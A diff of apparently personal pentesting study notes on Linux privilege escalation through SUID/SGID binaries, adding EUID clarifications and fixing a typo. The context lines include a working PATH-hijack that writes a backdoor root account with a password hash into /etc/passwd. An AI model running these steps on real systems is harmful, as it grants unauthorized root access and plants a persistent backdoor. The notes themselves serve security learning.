KhaelK138/KhaelK138.github.io/markdown/LinuxPrivilegeEscalation.md

 **SetUID/SetGID**
 - Linpeas will check for `setuid` and `setgid` executables
-- These binaries can be executed by users with the rights of the owner or owner's group
+- These binaries can be executed by users with the rights of the owner or owner's group (EUID changes)
-	- Thus, getting commands through one of these executables allows privesc
     - Search for these files with `find / -perm -u=s -type f 2>/dev/null`
 		- Then, check if abusable with GTFO bins
+	- Thus, getting commands (which respect a different EUID) through one of these executables is a privesc
+    	- Running `id` with command injection would result in `uid=1000({user}}) gid=1000({user_group}) euid=0(root) groups=1000({user_group})`
 - Scripts, like bash/python scripts, *can* have the suid bit, but will not execute as root until manually setting the UID to 0
 	- For example, if a python script has the setuid bit, it will need to `os.setuid(0)` before anything is run as root
-		- This is done for safety reasons due to a kernel race conditionw with loading and execution scripts
+		- This is done for safety reasons due to a kernel race condition with loading and execution scripts
 	- However, after these scripts elevate their privileges, we can modify our own path such that ANY binaries are ours
 		- `echo "echo 'root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash' >> /etc/passwd" > /tmp/cat` (replace cat with target binary)
 		- `chmod +x /tmp/cat`
 		- `export PATH=/tmp:$PATH` (placing `/tmp` at the front so our "binaries" come first)
 		- Then, just run the script.
 After privileges are elevated and any of our binaries are called, we'll get the user added to `/etc/passwd`
+- Additionally, some binaries, like `bash` or `sh`, will not use the EUID set by a suid binary
+  - This is done for safety reasons, so even if we spawn a bash shell, the new shell will run as our current user (uid)

 **Abuse Capabilities**
 - Capabilities provide fine-grain privilege granting to processes